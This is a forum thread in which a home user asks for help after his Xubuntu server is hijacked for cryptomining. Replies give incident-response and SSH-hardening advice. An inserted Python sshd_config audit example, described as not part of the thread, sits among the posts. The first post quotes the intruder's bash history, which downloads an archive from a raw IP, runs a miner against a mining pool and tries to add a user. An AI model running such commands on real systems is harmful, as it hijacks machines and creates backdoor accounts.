
Thread: Xubuntu 12.04/64, OpenSSH Server Hacked


  1. #1
    Join Date
    Sep 2009
    Location
    Norway
    Beans
    46
    Distro
    Ubuntu 13.10 Saucy Salamander

    Xubuntu 12.04/64, OpenSSH Server Hacked

    Last night I discovered a task on my Xubuntu 12.04/64 server (yes, conky is nice to have): a process "m64.pl" was using about 85-100% CPU time. After checking with everyone in my family I see only one option: I have been hacked, possibly through a Windows 7 computer, since port 22 is closed in the DSL router.

    Here is the bash history left by the hacker:

    free -m
    cat /proc/cpuinfo
    uname -a
    ls -l
    cd Public
    wget 79.114.47.143/m64.zip
    unzip m64.zip
    chmod +x *
    ./m64.pl -o stratum+tcp://linuxpower.cf:3333 -u sebywarlord.1 -p miningltcs -B
    ps -x
    pgrep minerd
    w
    ifconfig
    sude
    sudo
    sudo useradd ruut
    useradd ruut
    su root useradd
    exit

    To me it seems that someone has started a bitcoin task.

    What I have done is kill the process, remove the files in /Public (had to do it as root as they were locked) and uninstall "OpenSSH Server".

    Any suggestions on how to handle this would be most appreciated.

    Morten (Smiling after all)
    Last edited by mbogevik; February 4th, 2014 at 07:54 PM.

  2. #2
    Join Date
    Sep 2009
    Location
    Norway
    Beans
    46
    Distro
    Ubuntu 13.10 Saucy Salamander

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    It may be that the login is not an SSH login, since both of my users say "Last login: Fri Jan 17 12:06:37 2014" when I enter the command "lastlog". Also I have Hamachi online on the computer. Still investigating...

  3. #3
    Join Date
    Jan 2008
    Location
    Bay Area, CA/Kanagawa, JP
    Beans
    248
    Distro
    Xubuntu 13.10 Saucy Salamander

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    lol... don't open your ssh server with PW auth to the wild world of the internet? You can see the ssh login attempts in /var/log/auth.log

    I'd wipe and reinstall the system if I were you..

  4. #4
    Join Date
    Jan 2009
    Location
    South Carolina
    Beans
    Hidden!
    Distro
    Ubuntu 14.04 Trusty Tahr

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    Quote Originally Posted by brokenhachi:
    lol... don't open your ssh server with PW auth to the wild world of the internet? You can see the ssh login attempts in /var/log/auth.log

    I'd wipe and reinstall the system if I were you..
    +1 on wiping and reinstalling.

    Also, in the future be sure to disable password authentication in /etc/ssh/sshd_config.

    This is a great tutorial on how to setup key-based authentication with your ssh server.
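The sshd_config change recommended above, shown as an added example that is not part of this thread: a constructed pre-hardening excerpt (the weak settings), the same file with password and root logins disabled, and a small audit that parses sshd_config the way sshd reads it (first occurrence of a keyword wins) and reports anything that still allows password logins. Match blocks are deliberately not audited; that is an assumption of the example, not a property of sshd.

```python
import re

# Constructed excerpt resembling an Ubuntu 12.04 /etc/ssh/sshd_config before hardening:
# root may log in and PasswordAuthentication is commented out (sshd then defaults to yes).
WEAK_SSHD_CONFIG = """\
# Package generated configuration file
Port 22
Protocol 2
PermitRootLogin yes
PubkeyAuthentication yes
#PasswordAuthentication yes
ChallengeResponseAuthentication no
UsePAM yes
"""

# The same file after following the advice in the post: keys only, no password or root logins.
HARDENED_SSHD_CONFIG = WEAK_SSHD_CONFIG.replace(
    "PermitRootLogin yes", "PermitRootLogin no"
).replace("#PasswordAuthentication yes", "PasswordAuthentication no")

# Expected values for a key-only server (keyword names are case-insensitive in sshd_config).
POLICY = {
    "passwordauthentication": "no",
    "challengeresponseauthentication": "no",
    "pubkeyauthentication": "yes",
    "permitrootlogin": "no",
}

def parse_sshd_config(text):
    """Effective global settings: first occurrence of a keyword wins, blank and '#' lines are
    skipped, 'Key value' and 'Key=value' are accepted. Assumption: stop at the first Match block."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, value = (re.split(r"[ \t=]+", line, maxsplit=1) + [""])[:2]
        if key.lower() == "match":
            break
        settings.setdefault(key.lower(), value.strip())
    return settings

def audit_sshd_config(text):
    """Return (keyword, actual, expected) for every policy item that is missing or wrong;
    actual is None when the keyword is unset and sshd's compiled-in default applies."""
    settings = parse_sshd_config(text)
    return [(key, settings.get(key), want) for key, want in POLICY.items()
            if settings.get(key, "").lower() != want]

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_SSHD_CONFIG), ("hardened", HARDENED_SSHD_CONFIG)):
        print(name, "->", audit_sshd_config(cfg) or "no findings")
```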

  5. #5
    Join Date
    Sep 2009
    Location
    Norway
    Beans
    46
    Distro
    Ubuntu 13.10 Saucy Salamander

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    Yes, a large number of login attempts in /var/log/auth.log...

    But the thing is, I do not have port 22 open on the router (DSL); only the Teamspeak 3 server and my kids' Minecraft server are open to the world.

    I think that I first need to find out how this person got access; wipe and reinstall may not help if it is through a Windows 7 computer or any other "box" on my LAN, like the Xbox 360, Raspberry Pi, VU++ satellite tuner, Popcorn media player or even the Synology DS213j NAS. But in the end I think the six computers with Windows 7 are the largest gift to a hacker.

    I'll check the netstat command when back from work.
    Last edited by mbogevik; February 5th, 2014 at 12:23 PM.

  6. #6
    Join Date
    Nov 2013
    Location
    On the edge
    Beans
    843
    Distro
    Ubuntu

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    This guy (the hacker) isn't the sharpest knife in the drawer. Check the logs on your Minecraft & Teamspeak servers for connections from the same IP.

    It doesn't really matter how he got in. You could spend a ton of money and time trying to find out. I recommend you focus on inspecting each box the best you can for any evidence of intrusion. Then reimage the ones that are affected. Then figure out how to secure the network.

    This of course assumes you have backups... If you don't, then unplug the network from the Internet and go buy yourself an external drive to copy all your data to.
    Last edited by bashiergui; February 5th, 2014 at 04:07 PM.
    Knock knock.
    Race condition.
    Who's there?

  7. #7
    Join Date
    Oct 2009
    Beans
    Hidden!
    Distro
    Ubuntu 16.04 Xenial Xerus

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    Quote Originally Posted by mbogevik:
    Yes, a large number of login attempts in /var/log/auth.log...

    But the thing is, I do not have port 22 open on the router (DSL); only the Teamspeak 3 server and my kids' Minecraft server are open to the world.

    I think that I first need to find out how this person got access; wipe and reinstall may not help if it is through a Windows 7 computer or any other "box" on my LAN, like the Xbox 360, Raspberry Pi, VU++ satellite tuner, Popcorn media player or even the Synology DS213j NAS. But in the end I think the six computers with Windows 7 are the largest gift to a hacker.

    I'll check the netstat command when back from work.
    You could also try posting a chunk of the auth.log after removing any personal information. Does the source IP show as coming from your internal network or from outside?

    Do you have UPnP enabled on your router?
    Come to #ubuntuforums! We have cookies! | Basic Ubuntu Security Guide

    Tomorrow's an illusion and yesterday's a dream, today is a solution...

  8. #8
    Join Date
    Nov 2013
    Location
    On the edge
    Beans
    843
    Distro
    Ubuntu

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    But the thing is I do not have port 22 open on router (DSL), only Teamspeak 3 server and my kids Minecraft server is open to the world.
    But you have port 22 open on your private network? Then I guess he opened it up to the internet. That would require a router reconfig. Do you have default credentials on the router?

    Here are my recommendations for someone technically savvy but not a professional security guy:

    1. Reset the router, Wii, Xbox, PS to factory settings. That will boot him off if he managed to own one of them.
    2. Download 2 or 3 free antivirus scanners (AVG, McAfee, Malwarebytes, whatever. Just pick a recognizable name). Install & update them on all Windows boxes.
    3. Unplug the whole network from the internet.
    4. Scan all the Windows desktops/laptops and servers with AV. If any infections are found, then reimage it. You can copy data off onto an external drive relatively safely before you reimage if necessary.
    5. Inspect the Windows servers for odd or missing event logs. Any signs of hacking, just reimage.
    6. We already decided your Ubuntu server is owned, so reimage that.

    Then as you rebuild the systems I encourage you to research how to secure the network and machines. Secure all your running services with keys if you can, strong long passwords if not. Don't allow anonymous FTP login. Make all the boxes automatically update. Install EMET on the Windows boxes. http://www.microsoft.com/en-us/downl....aspx?id=39273
    Use a firewall on each host. Disable UPnP.
    Last edited by bashiergui; February 6th, 2014 at 03:36 AM.

  9. #9
    Join Date
    Jan 2008
    Location
    Bay Area, CA/Kanagawa, JP
    Beans
    248
    Distro
    Xubuntu 13.10 Saucy Salamander

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    +1 for this. I'm a huge fan of Malwarebytes and ClamAV. Also, the Kaspersky rescue disk is great for offline scanning (i.e. livecd). If you don't know it, this is a great little GUI for iptables based firewalls (among others): http://www.fwbuilder.org/

    If you need remote admin access to the network, maybe consider OpenVPN, or getting an actual firewall appliance (which I highly recommend, as it's a great learning experience if you're interested in networking/security). You can then configure IPsec VPNs and use Shrew to connect when needed. You can pick up good deals from some sites..

    Good luck!

  10. #10
    Join Date
    Jun 2007
    Location
    Porirua, New Zealand
    Beans
    Hidden!
    Distro
    Ubuntu

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    Thread moved to Security Discussions.
    Forum DOs and DON'Ts
    Never assume that information you find using a search engine is up-to-date.
    Please use CODE tags.
    A low-volume blog
